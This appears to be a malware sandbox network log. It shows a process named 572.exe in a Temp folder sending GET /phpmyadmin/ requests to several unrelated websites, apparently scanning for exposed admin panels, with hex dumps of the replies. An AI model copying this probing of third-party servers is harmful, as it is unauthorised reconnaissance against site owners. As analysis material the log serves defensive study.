                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC4096INData Raw: 20 7d 29 2e 62 6c 75 72 28 29 3b 0d 0a 0d 0a 2f 2f 20 09 09 7d 0d 0a 0d 0a 2f 2f 20 09 29 0d 0a 0d 0a 0d 0a 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 0d 0a 2a 09 09 46 69 6d 20 43 6f 6d 70 6c 65 6d 65 6e 74 6f 20 70 61 72 61 20 46 75 6e c3 a7 c3 a3 6f 20 61 75 6d 65 6e 74 61 20 61 20 66 6f 6e 74 65 20 65 6d 20 74 72 c3 aa 20 74 61 6d 61 6e 68 6f 73 20 66 69 78 6f 09 2a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }).blur();// }// )/*************************************************************************Fim Complemento para Funo aumenta a fonte em tr tamanhos fixo*****************************************************************
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1423INData Raw: 2e 63 61 69 78 61 2e 67 6f 76 2e 62 72 2f 61 63 61 69 78 61 2f 74 72 61 6e 73 70 61 72 65 6e 63 69 61 2e 61 73 70 22 3e 54 72 61 6e 73 70 61 72 c3 aa 6e 63 69 61 20 50 c3 ba 62 6c 69 63 61 3c 2f 41 3e 0d 0a 20 0d 0a 3c 2f 44 49 56 3e 0d 0a 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 68 6f 6d 65 5f 66 65 72 72 61 6d 65 6e 74 61 73 22 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 66 65 72 72 61 6d 65 6e 74 61 73 5f 32 30 31 31 5f 63 6f 6e 74 65 6e 74 22 3e 0d 0a 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 72 6f 64 61 70 65 5f 66 65 72 72 61 6d 65 6e 74 61 73 22 3e 0d 0a 0d 0a 09 09 09 09 3c 55 4c 20 63 6c 61 73 73 3d 22 69 64 69 6f 6d 61 73 22 3e 0d 0a 0d 0a 3c 4c 49 3e 3c 41 20 74 69 74 6c 65 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .caixa.gov.br/acaixa/transparencia.asp">Transparncia Pblica</A> </DIV></div></div><div id="home_ferramentas"><div id="ferramentas_2011_content"><div id="rodape_ferramentas"><UL class="idiomas"><LI><A title=


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                59192.168.2.654682104.21.14.245443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC679INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 4513
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tj8dIEbTwSPdWNRznsFeewEw2uBurTvW5HG%2BPlLAwOevNGojn%2F26SKJGRDCitS6gkz%2BBMsqGNSmBc1Dxj89MlLsVbj4PzmK3u6CWH%2FhwR6epHZQPAd4IXlPagk4mp4ilDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb72ea414503-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC690INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabl
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1369INData Raw: 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f 6e 6c 69 6e 65 20 61 74 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online atta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1085INData Raw: 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">81.181.57.74</span> <span class="cf-footer-separator sm:hidden">&bull;<


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                60192.168.2.654835188.212.100.154443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=rtur6hoqaf21rvl5kkdt1jqlm7; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:18 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC825INData Raw: 32 31 36 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 7a 61 72 6b 61 6e 61 32 2e 72 6f 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 61 72 6b 61 6e 61 32 20 2d 20 50 56 4d 20 48 41 52 44 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 61 72 6b 61 6e 61 32 20 65 73 74 65 20 63 65 6c 20 6d 61 69 20 62 75 6e 20 73 65 72 76 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2163<html><head><meta property="og:url" content="https://zarkana2.ro/" /><meta property="og:type" content="website" /><meta property="og:title" content="Zarkana2 - PVM HARD" /><meta property="og:description" content="Zarkana2 este cel mai bun serve
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC7730INData Raw: 63 6c 61 73 69 63 2c 73 65 72 76 65 72 2c 70 72 69 76 61 74 2c 73 65 72 76 65 72 20 70 72 69 76 61 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 31 30 22 3e 0a 3c 74 69 74 6c 65 3e 5a 61 72 6b 61 6e 61 32 20 2d 20 50 56 4d 20 48 41 52 44 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 35 36 33 35 37 32 31 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: clasic,server,privat,server privat" /><meta name="viewport" content="width=1110"><title>Zarkana2 - PVM HARD</title><link rel="icon" type="image/png" href="images/favicon.png" ><script async src="https://www.googletagmanager.com/gtag/js?id=UA-75635721-
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC3789INData Raw: 65 63 31 0d 0a 0a 09 09 3c 74 72 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 0a 09 09 3c 74 64 20 77 69 64 74 68 3d 22 32 35 22 3e 3c 69 6d 67 20 73 72 63 3d 27 69 6d 61 67 65 73 2f 72 61 6e 6b 69 6e 67 2f 72 61 6e 6b 69 6e 67 5f 66 69 72 73 74 5f 70 6c 61 63 65 2e 70 6e 67 27 20 2f 3e 3c 2f 74 64 3e 0a 09 09 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 22 3e 55 6e 69 71 75 65 3c 2f 74 64 3e 0a 09 09 3c 2f 74 72 3e 20 0a 09 09 3c 74 72 3e 0a 09 09 09 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 33 22 20 68 65 69 67 68 74 3d 22 35 22 3e 3c 2f 74 64 3e 0a 09 09 3c 2f 74 72 3e 0a 09 3c 2f 74 61 62 6c 65 3e 0a 09 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 77 6d 62 6d 32 5f 31 39
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ec1<tr class="top"><td width="25"><img src='images/ranking/ranking_first_place.png' /></td><td width="100">Unique</td></tr> <tr><td colspan="3" height="5"></td></tr></table></td> </tr> <tr> <td><img src="images/wmbm2_19


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                61192.168.2.654865104.255.105.79443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC185OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1463INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                DBI: aa1ab776c9c33156e0ec0f4fd18c8cafd0ef4a16
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src *.rockstargames.com s.rsg.sc; script-src 'nonce-lnM7PYB6x3ufst9kFzOvVjP6PBUrbFeskimNQPt0QTY=' 'report-sample' *.rockstargames.com s.rsg.sc cdn.cookielaw.org www.google-analytics.com *.googletagmanager.com rockstar-api.arkoselabs.com rockstar-api.arkoselabs.cn recaptcha.net; img-src https:; frame-src *.arkoselabs.com recaptcha.net; connect-src *.rockstargames.com *.google-analytics.com *.doubleclick.net *.sentry.io *.lifeinvader.com *.analytics.google.com *.googletagmanager.com cdn.cookielaw.org geolocation.onetrust.com privacyportal.onetrust.com; style-src 'unsafe-inline' *.rockstargames.com s.rsg.sc translate.googleapis.com; object-src 'none'; font-src fonts.gstatic.com; report-uri https://scapi.rockstargames.com/report/cspViolation;
                                                                                                                                                                                                                                                                                                                                                                CorrelationId: 783b8dad-7652-41b3-913c-8d69978e12df
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: session-id=240bc59b-14a4-4fab-8a2f-a78effb5f732; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=Edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS01a305c4=01e681cfdb39ec27aca0a4072d6631b19b97eca4c5fb3b1cef86a0a19daa3b184eb640d8e90044014dd90f9f20b180fc130a14f2e7c028e3c0682c07df109729c97fdfb218; Path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC3109INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 31 30 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 6c 74 31 30 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lte IE 10 ]><html class="ielt10" lang="en-US"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html class="" lang="en-US">...<![endif]--><head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="u


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                62192.168.2.654620178.16.128.181443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC762INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.26
                                                                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-cache-control: public,max-age=3600
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-tag: 106_HTTP.404,106_404,106_URL.ba909b44cf9b50134ed01a5f820a730d,106_
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-cache: miss
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC606INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10000<!DOCTYPE html>...[if IE 8]><html class="ie8"><![endif]-->...[if IE 9]><html class="ie9"><![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head>... Google tag (gtag.js) --><script async src="https://www.googletagman
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC14994INData Raw: 57 6b 41 75 49 77 58 56 45 33 5a 6d 35 75 52 30 6c 4b 45 66 4b 54 48 64 4c 32 43 33 6b 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: WkAuIwXVE3Zm5uR0lKEfKTHdL2C3k" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="user-scalable=yes, width=device-width, initial-scale=1.0, maximum-scale=1">... Global site tag (gtag.js) - Google Anal
